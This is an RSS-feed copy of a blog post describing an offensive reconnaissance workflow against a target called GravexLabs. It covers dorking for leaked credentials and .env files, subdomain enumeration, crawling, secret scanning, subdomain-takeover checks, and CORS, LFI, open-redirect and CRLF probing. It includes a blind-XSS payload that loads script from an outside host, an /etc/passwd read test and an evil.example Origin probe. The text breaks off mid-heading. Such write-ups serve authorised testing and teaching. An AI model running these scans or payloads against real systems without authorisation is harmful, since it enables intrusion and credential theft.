<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Glenn Rodney</title>
    <description>The latest articles on DEV Community by Glenn Rodney (@rodneys_int).</description>
    <link>https://dev.to/rodneys_int</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3123838%2F928b6218-b855-48e8-a3fc-189c0d0567bd.jpg</url>
      <title>DEV Community: Glenn Rodney</title>
      <link>https://dev.to/rodneys_int</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/rodneys_int"/>
    <language>en</language>
    <item>
      <title>A Deep Dive into a Real-World Recon Workflow</title>
      <dc:creator>Glenn Rodney</dc:creator>
      <pubDate>Tue, 01 Jul 2025 22:16:43 +0000</pubDate>
      <link>https://dev.to/rodneys_int/a-deep-dive-into-a-real-world-recon-workflow-hpi</link>
      <guid>https://dev.to/rodneys_int/a-deep-dive-into-a-real-world-recon-workflow-hpi</guid>
      <description>&lt;p&gt;So, you've landed the engagement. The scope is defined, the rules of engagement are set, and the target is locked: &lt;strong&gt;GravexLabs&lt;/strong&gt;. You have the name, and that's it. This is the starting point for every offensive security operation, a blank canvas that, through skill and methodology, will be painted into a detailed map of attack surfaces, endpoints, and potential vulnerabilities.&lt;/p&gt;

&lt;p&gt;This isn't just about running a few tools. It's a structured process, a symphony of techniques designed to peel back the layers of a target's digital presence. RAWPA is made for this process. While RAWPA is built to host and guide you through complete pentesting methodologies, today I want to give you something more concrete. I'm going to walk you through my personal, battle-tested reconnaissance workflow.&lt;/p&gt;

&lt;p&gt;This process is so central to my work that I've even streamlined it into a framework called &lt;strong&gt;AAweRT - An Awesome Reconnaissance Tool&lt;/strong&gt; (&lt;a href="https://github.com/Kuwguap/aawert/" rel="noopener noreferrer"&gt;github.com/Kuwguap/aawert/&lt;/a&gt;):&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6c8jfm8rpuvfokj1mkhx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6c8jfm8rpuvfokj1mkhx.png" alt="AAweRT" width="800" height="812"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;AAweRT encapsulates the logic we're about to explore. Forget the "get bugs quick" fantasy; this is about building a foundation of deep intelligence for a successful, professional engagement.&lt;/p&gt;

&lt;p&gt;Grab your terminal. Let's begin the hunt.&lt;/p&gt;

&lt;h3&gt;
  
  
  Phase 1: The OSINT Dragnet - Reconnaissance Without Touching
&lt;/h3&gt;

&lt;p&gt;Before we send a single packet to GravexLabs' servers, we gather intelligence from the vast ocean of public information. This is Open-Source Intelligence (OSINT), and it’s the quietest and often most revealing phase.&lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;1.1: Advanced Search Fu: Google and GitHub Dorking&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;Never, ever underestimate the power of a well-crafted search query.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Google Dorking:&lt;/strong&gt; We use advanced operators to find what isn't meant to be found.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;site:gravexlabs.com&lt;/code&gt; - The basics: map out the intended public site.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;site:*.gravexlabs.com -www&lt;/code&gt; - Find all subdomains indexed by Google, excluding the main &lt;code&gt;www&lt;/code&gt; site.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;inurl:gravexlabs filetype:log&lt;/code&gt; - Hunt for exposed log files.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;intext:"GravexLabs API Key" | intext:"GravexLabs password"&lt;/code&gt; - The long shots that sometimes pay off spectacularly.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

&lt;p&gt;&lt;strong&gt;GitHub Dorking:&lt;/strong&gt; This is non-negotiable for any modern company. Developers make mistakes, and public repositories can be a goldmine of leaked secrets.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;"gravexlabs.com" password&lt;/code&gt; - Search for hardcoded passwords related to the domain.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;"gravexlabs.com" api_key&lt;/code&gt; - Hunt for API keys.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;"gravexlabs.com" filename:config.js&lt;/code&gt; - Look for configuration files.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;"gravexlabs.com" filename:.env&lt;/code&gt; - Search for leaked environment files, which often contain database credentials, secret keys, and more.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;/ul&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;1.2: Mapping the Infrastructure: ASN, crt.sh, and Censys&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;Next, we map the physical and logical infrastructure.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;ASN Lookup:&lt;/strong&gt; We identify GravexLabs' Autonomous System Number (ASN) using &lt;code&gt;whois&lt;/code&gt; on their domain's IP. This ASN is their unique identifier on the internet. With the ASN, we can query BGP data to find all IP ranges they own. This is our hunting ground.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Certificate Transparency (crt.sh):&lt;/strong&gt; Every time an SSL/TLS certificate is issued, it's logged publicly. Searching &lt;code&gt;crt.sh&lt;/code&gt; for &lt;code&gt;%.gravexlabs.com&lt;/code&gt; gives us a historical and current list of subdomains. This often reveals internal, staging, or forgotten assets that are still live.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Censys.io:&lt;/strong&gt; Think of Censys as a search engine for the devices and networks that make up the internet. We can search for GravexLabs' ASN or known IP ranges to get a bird's-eye view of their open ports and running services across their entire infrastructure, often identifying services without needing to scan them directly ourselves.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
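
&lt;p&gt;As a quick illustration of the crt.sh step, here is a coreutils-only sketch for pulling unique hostnames out of its JSON output. The &lt;code&gt;common_name&lt;/code&gt; field name matches crt.sh's JSON as of this writing; &lt;code&gt;jq&lt;/code&gt; is the cleaner choice if you have it installed.&lt;/p&gt;

```shell
# Quick-and-dirty sketch: extract unique hostnames from crt.sh JSON output
# using only coreutils. Reads JSON on stdin, emits sorted unique names.
crtsh_names() {
  grep -oE '"common_name":"[^"]+"' | cut -d'"' -f4 | sort -u
}

# Example (crt.sh's documented wildcard query; %25 is a URL-encoded %):
# curl -s "https://crt.sh/?q=%25.gravexlabs.com&amp;output=json" | crtsh_names
```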

&lt;h3&gt;
  
  
  Phase 2: The Command Line Unleashed - A Live-Fire Methodology
&lt;/h3&gt;

&lt;p&gt;With our passive intelligence gathered, it's time to get our hands dirty. The following is a highly effective, tool-driven workflow that forms the core of my &lt;code&gt;AAweRT&lt;/code&gt; framework. It's designed for efficiency and depth, moving logically from broad discovery to specific vulnerability probing.&lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;2.1: Mass Subdomain Discovery&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;Our OSINT work gave us a good starting list, but it's not exhaustive. We now use &lt;code&gt;subfinder&lt;/code&gt;, which aggregates dozens of passive data sources, to enumerate every subdomain it can find.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;subfinder &lt;span class="nt"&gt;-dL&lt;/span&gt; domains.txt &lt;span class="nt"&gt;-all&lt;/span&gt; &lt;span class="nt"&gt;-recursive&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; subdomains.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;subfinder -dL domains.txt&lt;/code&gt;: We feed it a file (&lt;code&gt;domains.txt&lt;/code&gt;) containing our root domain (&lt;code&gt;gravexlabs.com&lt;/code&gt;).&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;-all&lt;/code&gt;: This is crucial. It tells &lt;code&gt;subfinder&lt;/code&gt; to use all of its available passive sources (crt.sh, VirusTotal, and so on).&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;-recursive&lt;/code&gt;: If it finds &lt;code&gt;dev.gravexlabs.com&lt;/code&gt;, it will then search for subdomains of that, like &lt;code&gt;api.dev.gravexlabs.com&lt;/code&gt;. This is how you find deep, forgotten assets.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;-o subdomains.txt&lt;/code&gt;: We save our massive list of findings for the next step.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
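
&lt;p&gt;Before moving on, it pays to fold the OSINT lists (crt.sh, dorking notes) into the &lt;code&gt;subfinder&lt;/code&gt; output and drop anything out of scope. A minimal sketch, with illustrative file names and scope regex:&lt;/p&gt;

```shell
# Sketch: merge subdomain lists from multiple sources into one
# deduplicated, in-scope file. The scope regex and file names are
# illustrative, not part of any tool's interface.
merge_subdomains() {
  scope_re="$1"; shift
  cat "$@" | tr 'A-Z' 'a-z' | sort -u | grep -E "$scope_re"
}

# merge_subdomains '\.gravexlabs\.com$' subdomains.txt crtsh.txt > all_subs.txt
```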

&lt;h4&gt;
  
  
  &lt;strong&gt;2.2: Probing for Life&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;We have a list of hundreds, maybe thousands, of potential subdomains. Are they alive? Are they hosting web services? &lt;code&gt;httpx-toolkit&lt;/code&gt; answers this with blistering speed.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat &lt;/span&gt;subdomains.txt | httpx-toolkit &lt;span class="nt"&gt;-ports&lt;/span&gt; 443,80,8080,8000,8888 &lt;span class="nt"&gt;-threads&lt;/span&gt; 200 &lt;span class="nt"&gt;-o&lt;/span&gt; subdomains_alive.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;cat subdomains.txt |&lt;/code&gt;: We pipe our list directly into &lt;code&gt;httpx-toolkit&lt;/code&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;-ports 443,80,8080,8000,8888&lt;/code&gt;: We focus on the most common HTTP/HTTPS ports. This is a strategic choice to balance speed and coverage.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;-threads 200&lt;/code&gt;: We crank up the concurrency for speed. Adjust this based on your machine and network.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;-o subdomains_alive.txt&lt;/code&gt;: The output is a clean list of live web servers, ready for deeper inspection.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
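
&lt;p&gt;One small helper worth keeping around: &lt;code&gt;httpx-toolkit&lt;/code&gt; emits URLs (a scheme and sometimes a port), while later DNS-level checks want bare hostnames. A sketch that strips both:&lt;/p&gt;

```shell
# Helper sketch: turn "https://host:port/path" lines into unique bare
# hostnames. Reads URLs on stdin.
hosts_from_urls() {
  sed -E 's#^https?://##; s#[:/].*$##' | sort -u
}

# cat subdomains_alive.txt | hosts_from_urls
```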

&lt;h4&gt;
  
  
  &lt;strong&gt;2.3: Mapping the Digital Attack Surface with Katana&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;Now we know what's live. The next question is: what's on them? &lt;code&gt;katana&lt;/code&gt;, a web crawler on steroids, will spider these sites to find endpoints, JavaScript files, and other interesting paths.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;katana &lt;span class="nt"&gt;-u&lt;/span&gt; subdomains_alive.txt &lt;span class="nt"&gt;-d&lt;/span&gt; 5 &lt;span class="nt"&gt;-pss&lt;/span&gt; waybackarchive,commoncrawl,alienvault &lt;span class="nt"&gt;-kf&lt;/span&gt; &lt;span class="nt"&gt;-jc&lt;/span&gt; &lt;span class="nt"&gt;-fx&lt;/span&gt; &lt;span class="nt"&gt;-ef&lt;/span&gt; woff,css,png,svg,jpg,woff2,jpeg,gif &lt;span class="nt"&gt;-o&lt;/span&gt; allurls.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;-u subdomains_alive.txt&lt;/code&gt;: We feed it our list of live hosts.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;-d 5&lt;/code&gt;: We set a crawl depth of 5 levels.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;-pss waybackarchive,commoncrawl,alienvault&lt;/code&gt;: This is pure gold. It tells katana to not only crawl the live site but also pull historical URLs from passive sources like the Wayback Machine. This finds endpoints that may no longer be linked but still exist.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;-kf&lt;/code&gt;: Also crawl known files such as &lt;code&gt;robots.txt&lt;/code&gt; and &lt;code&gt;sitemap.xml&lt;/code&gt;, which often reveal unlinked paths.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;-jc&lt;/code&gt;: Parse JavaScript files for hidden paths and endpoints.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;-fx -ef ...&lt;/code&gt;: We filter out uninteresting file extensions like fonts and images to keep our output clean and focused on actionable URLs.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;-o allurls.txt&lt;/code&gt;: All discovered URLs are saved. This file is now our primary source for vulnerability hunting.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
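
&lt;p&gt;With &lt;code&gt;allurls.txt&lt;/code&gt; in hand, a quick triage trick is to count URLs per host so the noisiest (often most feature-rich) applications get attention first. A coreutils sketch:&lt;/p&gt;

```shell
# Triage sketch: count discovered URLs per host. Splitting on "/" makes
# field 3 the host portion of each URL. Output lines are "count host",
# busiest hosts first.
urls_per_host() {
  awk -F/ '{print $3}' | sort | uniq -c | sort -rn | awk '{print $1, $2}'
}

# cat allurls.txt | urls_per_host | head
```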

&lt;h3&gt;
  
  
  Phase 3: Analysis &amp;amp; Initial Vulnerability Scanning
&lt;/h3&gt;

&lt;p&gt;With a huge list of URLs, we can begin our automated, targeted analysis.&lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;3.1: The Hunt for Leaks and Secrets&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;The first quick win is to search our URL list for files that should never be public.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat &lt;/span&gt;allurls.txt | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-E&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;txt|&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;log|&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;cache|&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;secret|&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;db|&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;backup|&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;yml|&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;json|&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;gz|&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;rar|&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;zip|&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;config"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This simple &lt;code&gt;grep&lt;/code&gt; command filters our massive URL list for common sensitive file extensions. Finding a &lt;code&gt;.log&lt;/code&gt;, &lt;code&gt;.backup&lt;/code&gt;, or &lt;code&gt;.config&lt;/code&gt; file can often lead to immediate information disclosure.&lt;/p&gt;
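
&lt;p&gt;One caveat worth knowing: an unanchored pattern like &lt;code&gt;\.log&lt;/code&gt; also matches inside longer words (&lt;code&gt;.login&lt;/code&gt;, &lt;code&gt;.jsonp&lt;/code&gt;). A slightly tighter sketch anchors the extension to the end of the path or the start of a query string:&lt;/p&gt;

```shell
# Tighter variant (a sketch): require the extension to be followed by
# end-of-line or a "?", so ".log" no longer matches ".login" and ".json"
# no longer matches ".jsonp".
sensitive_files() {
  grep -E '\.(txt|log|cache|secret|db|backup|yml|json|gz|rar|zip|config)($|\?)'
}

# cat allurls.txt | sensitive_files
```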

&lt;h4&gt;
  
  
  &lt;strong&gt;3.2: JavaScript Recon and Exposure Scanning&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;JavaScript files are a treasure map of application logic. We first isolate them and then run specialized scans.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat &lt;/span&gt;allurls.txt | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-E&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;js$"&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; js.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat &lt;/span&gt;js.txt | nuclei &lt;span class="nt"&gt;-t&lt;/span&gt; ~/nuclei-templates/http/exposures/ &lt;span class="nt"&gt;-c&lt;/span&gt; 30
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;&lt;p&gt;First, we &lt;code&gt;grep&lt;/code&gt; all URLs ending in .js into a dedicated file.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Then, we feed this list to &lt;code&gt;nuclei&lt;/code&gt;, a powerful pattern-based scanner. We use the &lt;code&gt;exposures&lt;/code&gt; templates, which are specifically designed to find things like API keys, secrets, and sensitive information accidentally hardcoded in JavaScript files.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
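
&lt;p&gt;Once the JavaScript files are downloaded locally, a plain &lt;code&gt;grep&lt;/code&gt; for well-known token shapes is a fast complementary first pass before the nuclei run finishes. As one example: &lt;code&gt;AKIA&lt;/code&gt; followed by 16 uppercase alphanumerics is the documented format for AWS long-term access key IDs; other services need their own patterns.&lt;/p&gt;

```shell
# Sketch: scan local .js files for AWS access key IDs. -o prints only the
# matching token, -h suppresses filenames so output is just unique keys.
scan_js_secrets() {
  grep -ohE 'AKIA[0-9A-Z]{16}' "$@" | sort -u
}

# scan_js_secrets downloaded_js/*.js   (directory name illustrative)
```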

&lt;h4&gt;
  
  
  &lt;strong&gt;3.3: Checking for Subdomain Takeover&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;A common misconfiguration is a DNS CNAME record pointing to a service (like an S3 bucket or a GitHub page) that has been de-provisioned. If we can re-register that service, we can take over the subdomain. &lt;code&gt;subzy&lt;/code&gt; automates this check.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;subzy run &lt;span class="nt"&gt;--targets&lt;/span&gt; subdomains.txt &lt;span class="nt"&gt;--concurrency&lt;/span&gt; 100 &lt;span class="nt"&gt;--hide_fails&lt;/span&gt; &lt;span class="nt"&gt;--verify_ssl&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This tool quickly checks our full subdomain list for fingerprints of services vulnerable to takeover. A single finding here can lead to a critical vulnerability.&lt;/p&gt;
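
&lt;p&gt;For a feel of what &lt;code&gt;subzy&lt;/code&gt; is doing under the hood, here is an offline companion sketch: given "subdomain cname" pairs (e.g. collected with &lt;code&gt;dig +short CNAME&lt;/code&gt;), flag records pointing at commonly re-registrable services. The fingerprints below are a small illustrative sample; subzy's verification against each service's "unclaimed" response is what actually confirms a takeover.&lt;/p&gt;

```shell
# Sketch: filter "subdomain cname" pairs for CNAMEs ending in services
# that have historically been claimable. The trailing \.? tolerates the
# root-dot dig appends to fully-qualified names.
takeover_candidates() {
  grep -E '(s3\.amazonaws\.com|github\.io|herokuapp\.com)\.?$'
}
```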

&lt;h4&gt;
  
  
  &lt;strong&gt;3.4: Probing for CORS Misconfigurations&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;Cross-Origin Resource Sharing (CORS) misconfigurations can allow a malicious website to make requests to the target application on behalf of a user. We attack this in two ways.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;python3 corsy.py &lt;span class="nt"&gt;-i&lt;/span&gt; subdomains_alive.txt &lt;span class="nt"&gt;-t&lt;/span&gt; 10 &lt;span class="nt"&gt;--headers&lt;/span&gt; &lt;span class="s2"&gt;"User-Agent: Googlebot&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s2"&gt;Cookie: SESSION=Hacked"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;nuclei &lt;span class="nt"&gt;-l&lt;/span&gt; subdomains_alive.txt &lt;span class="nt"&gt;-t&lt;/span&gt; ~/nuclei-templates/http/cors/ &lt;span class="nt"&gt;-c&lt;/span&gt; 30
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;corsy&lt;/code&gt;: This specialized tool sends probes with various Origin headers to test CORS policies. We add custom headers to mimic other scenarios.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;nuclei&lt;/code&gt;: We then run Nuclei's dedicated CORS templates for a second, comprehensive check against known misconfigurations.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
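
&lt;p&gt;In miniature, both tools are hunting for the same exploitable combination: a response that reflects an arbitrary &lt;code&gt;Origin&lt;/code&gt; and also allows credentials. A sketch of that final check, operating on raw response headers (regex-naive on dots, which is fine for a sketch):&lt;/p&gt;

```shell
# Sketch: read raw response headers on stdin; exit 0 only when the given
# origin is reflected AND credentials are allowed.
cors_reflected() {
  origin="$1"
  headers=$(cat)
  printf '%s\n' "$headers" | grep -qi "^access-control-allow-origin: *$origin" || return 1
  printf '%s\n' "$headers" | grep -qi '^access-control-allow-credentials: *true'
}

# curl -s -D - -o /dev/null -H "Origin: https://evil.example" https://target | cors_reflected "https://evil.example"
```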

&lt;h3&gt;
  
  
  Phase 4: Active Probing for Common Vulnerabilities
&lt;/h3&gt;

&lt;p&gt;This is a chained command for maximum efficiency.&lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;4.1: XSS (Cross-Site Scripting)&lt;/strong&gt;
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;subfinder &lt;span class="nt"&gt;-d&lt;/span&gt; gravexlabs.com | httpx-toolkit &lt;span class="nt"&gt;-silent&lt;/span&gt; | katana &lt;span class="nt"&gt;-ps&lt;/span&gt; &lt;span class="nt"&gt;-f&lt;/span&gt; qurl | gf xss | bxss &lt;span class="nt"&gt;-appendMode&lt;/span&gt; &lt;span class="nt"&gt;-payload&lt;/span&gt; &lt;span class="s1"&gt;'"&amp;gt;&amp;lt;script src=[https://xss.report/c/kuwguap](https://xss.report/c/kuwguap)&amp;gt;&amp;lt;/script&amp;gt;'&lt;/span&gt; &lt;span class="nt"&gt;-parameters&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Let's break it down:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;subfinder | httpx-toolkit | katana&lt;/code&gt;: We find, validate, and crawl for URLs in one go.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;| gf xss&lt;/code&gt;: We pipe the URLs to &lt;code&gt;gf&lt;/code&gt; (grep-friend). Using its &lt;code&gt;xss&lt;/code&gt; patterns, it filters for URLs that have parameters likely to be vulnerable to XSS (e.g., &lt;code&gt;?redirect=&lt;/code&gt;, &lt;code&gt;?q=&lt;/code&gt;, &lt;code&gt;?next=&lt;/code&gt;).&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;| bxss&lt;/code&gt;: This final pipe sends the highly-qualified URLs to &lt;code&gt;bxss&lt;/code&gt;, which automates the testing by injecting our custom payload (which points to an XSS reporting service) into every parameter.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;4.2: LFI (Local File Inclusion) &amp;amp; Open Redirects&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;We use a similar &lt;code&gt;gf&lt;/code&gt;-powered methodology for other bug classes.&lt;/p&gt;

&lt;h4&gt;
  
  
  LFI
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat &lt;/span&gt;allurls.txt | gf lfi | nuclei &lt;span class="nt"&gt;-t&lt;/span&gt; ~/nuclei-templates/http/vulnerabilities/lfi/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Open Redirect
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat &lt;/span&gt;allurls.txt | gf redirect | openredirex &lt;span class="nt"&gt;-p&lt;/span&gt; payloads.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For LFI, we find potential patterns with &lt;code&gt;gf&lt;/code&gt; and then use Nuclei's powerful LFI templates to attempt exploitation safely.&lt;/p&gt;

&lt;p&gt;For Open Redirects, we find potential URLs with &lt;code&gt;gf&lt;/code&gt; and then use &lt;code&gt;openredirex&lt;/code&gt; with a list of crafted payloads to confirm the vulnerability.&lt;/p&gt;
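
&lt;p&gt;When a candidate LFI needs manual confirmation, the classic &lt;code&gt;/etc/passwd&lt;/code&gt; read leaves an unmistakable signature in the response body. A minimal sketch of that check (the target URL in the comment is illustrative):&lt;/p&gt;

```shell
# Sketch: exit 0 if the response body on stdin contains the passwd-format
# root entry (root:...:0:0:), the usual proof of a successful LFI read.
lfi_hit() {
  grep -qE 'root:.*:0:0:'
}

# curl -s "https://target/page?file=../../../../etc/passwd" | lfi_hit
# (exit status 0 means the passwd format was found in the response)
```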

&lt;h4&gt;
  
  
  &lt;strong&gt;4.3: CRLF Injection&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;CRLF injection can lead to response splitting and other attacks. Nuclei has excellent templates for this.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat &lt;/span&gt;subdomains_alive.txt | nuclei &lt;span class="nt"&gt;-t&lt;/span&gt; ~/nuclei-templates/http/vulnerabilities/crlf-injection.yaml &lt;span class="nt"&gt;-v&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We feed our live hosts directly to Nuclei and let its specialized template handle the complex injection tests.&lt;/p&gt;
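
&lt;p&gt;What those templates probe for, in miniature: if a CR-LF sequence (&lt;code&gt;%0d%0a&lt;/code&gt;) in the request is echoed unencoded, the server can be tricked into emitting attacker-controlled response headers. A sketch of the confirmation step, using an arbitrary canary cookie name:&lt;/p&gt;

```shell
# Sketch: exit 0 if the injected canary header appears in the response
# headers read from stdin. The "crlf=1" canary is arbitrary.
crlf_injected() {
  grep -qi '^set-cookie: *crlf=1'
}

# curl -s -D - -o /dev/null "https://target/%0d%0aSet-Cookie:crlf=1" | crlf_injected
```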

&lt;h4&gt;
  
  
